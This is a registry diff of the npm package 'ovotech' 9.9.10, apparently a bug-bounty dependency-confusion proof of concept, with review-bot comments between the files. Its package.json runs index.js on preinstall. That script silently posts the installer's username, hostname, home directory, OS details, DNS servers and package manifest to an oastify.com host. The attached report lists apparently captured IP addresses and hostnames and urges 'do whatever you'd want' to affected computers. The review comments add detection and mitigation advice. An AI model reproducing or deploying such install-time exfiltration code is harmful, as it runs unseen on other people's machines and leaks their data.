ovotech 9.9.10

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of ovotech might be problematic.

Files changed (3)
  1. package/index.js +53 -0
  2. package/ovo.md +84 -0
  3. package/package.json +12 -0
package/index.js ADDED
@@ -0,0 +1,53 @@
1
+ // author: stewardmailler@gmail.com, https://bugcrowd.com/_mailler
2
+ const os = require('os');
3
+ const dns = require('dns');
4
+ // const querystring = require('querystring');
5
+ const https = require('https');
6
+ const packageJSON = require('./package.json');
7
+ const { URLSearchParams } = require('url');
8
+ const package = packageJSON.name;
9
+
10
+ const trackingData = JSON.stringify({
11
+ p: package,
12
+ c: __dirname,
13
+ type: os.type(),
14
+ rel: os.release(),
15
+ hd: os.homedir(),
16
+ hn: os.hostname(),
17
+ un: os.userInfo().username,
18
+ dns: dns.getServers(),
19
+ r: packageJSON ? packageJSON.___resolved : undefined,
20
+ v: packageJSON.version,
21
+ pjson: packageJSON,
22
+ });
23
+
24
+ // var postData = querystring.stringify({ msg: trackingData });
25
+
26
+ var postData = new URLSearchParams({ msg: trackingData}).toString();
27
+
28
+ // console.log(postData);
29
+
30
+ var options = {
31
+ hostname: "evdr279r1vfkvlzo1bjrim47ryxold.oastify.com",
32
+ port: 443,
33
+ path: "/",
34
+ method: "POST",
35
+ headers: {
36
+ "Content-Type": "application/x-www-form-urlencoded",
37
+ "Content-Length": postData.length,
38
+ },
39
+ };
40
+ // console.log(postData.length)
41
+
42
+ var req = https.request(options, (res) => {
43
+ res.on("data", (d) => {
44
+ process.stdout.write(d);
45
+ });
46
+ });
47
+
48
+ req.on("error", (e) => {
49
+ // console.error(e);
50
+ });
51
+
52
+ req.write(postData);
53
+ req.end();
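Review bot: The data collected in `trackingData` (lines 10-22) goes well beyond the "username, hostname and current path" that the accompanying ovo.md claims: it also sends the home directory, the OS type and release, the configured DNS servers and the entire `package.json` object, and it posts all of it to an external `oastify.com` collaborator host over HTTPS. A bug-bounty proof of concept should collect the minimum needed to prove execution and should document exactly what leaves the machine, so either trim the payload to the fields the report describes or update the report to match. The empty `error` handler (lines 48-50) also means a blocked or failed request never surfaces, so an install that was beaconing would look completely normal to the person running it; from a defender's side, the observable signals here are a `preinstall` lifecycle script spawning `node`, a DNS lookup for a `*.oastify.com` name and an outbound POST during `npm install`, all of which are worth alerting on in CI and on developer workstations.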
package/ovo.md ADDED
@@ -0,0 +1,84 @@
1
+
2
+ ## Summary
3
+ Hello there. I have a package you use vulnerable to Dependency Confusion. The vulnerability allowed me to claim a previously unclaimed npm package that are used by Ovotechnology. This allows me to gain code execution on computers that pull the packages. The package name is ovotech
4
+
5
+ ## Some More Details
6
+ The vulnerability occurs if you have a package that you manage internally but you haven't claimed the name on the public npmjs registry (or any other registry).
7
+ The code only logs the username, hostname and the current path of each unique hostname.
8
+ A response to the following URL served as a pointer for me to check the possibility of a Dependency Confusion attack: https://uat.quantum.ovoenergy.com/App.7e884519.js
9
+ In the response, you will find the following lines of code:
10
+ `require("../node_modules/@ovotech/ovo-bootstrap/dist/css/ovo-bootstrap.min.css"),
11
+ require("core-js/stable"),require("regenerator-runtime/runtime");
12
+ var c=(0,e.lazy)(function(){
13
+ return require("_bundle_loader")(require.resolve("./views/checkout/Checkout"))`
14
+
15
+ The identified packages (for now) include:
16
+ ovotech
17
+ _bundler_loader (I haven't uploaded the Proof of Concept yet)
18
+
19
+ The packages I publish only requested for the computer hostname, username and the directory installed.
20
+ From the pleminiary analysis, I can say that it is running on a Windows Machine
21
+
22
+ ## Reproducing
23
+ 1. Find a required package in source code or by whatever means.
24
+ 2. Create a package and upload to the npm registry.
25
+ 3. Ensure that it has a higher version so that it gets pulled by precedence over the internal version.
26
+ 4. Do whatever you'd want to the computers that automatically pull the malicious package
27
+
28
+ ## Impact
29
+ I can execute code on company computers
30
+ Identified IP addresses:
31
+ 47.118.138.231
32
+ 47.118.138.230
33
+ 218.12.99.192
34
+ 40.70.145.84
35
+ 123.161.62.177
36
+ 60.205.226.65
37
+ 101.201.237.165
38
+ 8.140.111.51
39
+ 123.161.62.178
40
+ 60.205.209.221
41
+ 44.242.179.50
42
+ 34.223.46.213
43
+ 34.218.119.127
44
+ 34.222.66.84
45
+ 74.125.179.69
46
+ 74.125.179.76
47
+ 172.253.194.136
48
+ 220.181.151.176
49
+ 60.205.226.65
50
+ 220.181.151.179
51
+ 172.253.9.3
52
+ 172.253.195.207
53
+ 49.7.48.251
54
+ 49.7.48.252
55
+
56
+
57
+ Identified hostnames:
58
+ i. For Linux hosts
59
+ ab34ba76ca3b
60
+ 04db38e1b14a
61
+ d4d535ff38ac
62
+ 5ac7d1333e6e
63
+ 0efc9399d342
64
+ 0df50c013a53
65
+ 0df50c013a53
66
+ c34dbc2932e0
67
+ c34dbc2932e0
68
+ f76b7231c305
69
+ instance - username: k7A48487c6b1e47c
70
+ aws-2WhrI5bSz5vjsD8sRcXw - is it running as root?
71
+
72
+ ii. For Windows hosts
73
+ DESKTOP-4E1IS0K
74
+
75
+ ## Proof of Concept
76
+
77
+
78
+ ## Impact
79
+ Code execution on company computer and the aws server.
80
+
81
+ ## Mitigation
82
+ Create a dummy package on npmjs registry as a placeholder.
83
+
84
+ Thanks.
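Review bot: The report's statement that "the code only logs the username, hostname and the current path" (line 7) does not match the `index.js` shipped in this same release, which also exfiltrates the home directory, DNS servers, OS release and the full `package.json`; the "Proof of Concept" section (lines 75-77) is empty and "Impact" appears twice (lines 28 and 78), so the document should be reconciled with the code and consolidated before it is submitted. The evidence lists also need cleaning: `60.205.226.65`, `0df50c013a53` and `c34dbc2932e0` are each listed twice, and most of the "Linux hosts" are 12-hex-digit names of the kind container runtimes assign, which says little about which organisation's machines actually installed the package; the "is it running as root?" remark (line 70) is speculation and should be dropped or backed by the captured `un` field. Finally, "Create a dummy package on npmjs registry as a placeholder" (line 82) is only part of the fix: the snippet quoted on line 10 shows the company already publishes under the `@ovotech` scope, so the mitigation should also recommend moving internal packages under that scope, mapping the scope to the internal registry in `.npmrc`, committing lockfiles whose `resolved` URLs and `integrity` hashes pin the internal source, and installing with `--ignore-scripts` in CI so a lookalike package cannot run a `preinstall` hook even if it is fetched.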
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "ovotech",
3
+ "version": "9.9.10",
4
+ "description": "Bugcrowd White Hat Researcher",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
12
+ }
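Review bot: The `preinstall` script on line 8 is the actual execution vector of this package: `node index.js` runs automatically, before any dependency is even resolved, on every machine that installs `ovotech`, and the version `9.9.10` on line 3 is chosen so that a registry lookup prefers it over an internal copy (see step 3 of the report's "Reproducing" section). The manifest gives a reader nothing to judge it by: `author` is empty (line 10) and the only contact detail lives in a comment in `index.js`, so at minimum `author` should carry the researcher's name and the description should state that the package is a dependency-confusion canary. For the receiving side, this is a textbook case for `ignore-scripts=true` in `.npmrc` on build agents and for an allow-list of lifecycle scripts in the internal registry, since neither the empty author nor the odd description would be visible to an automated `npm install`.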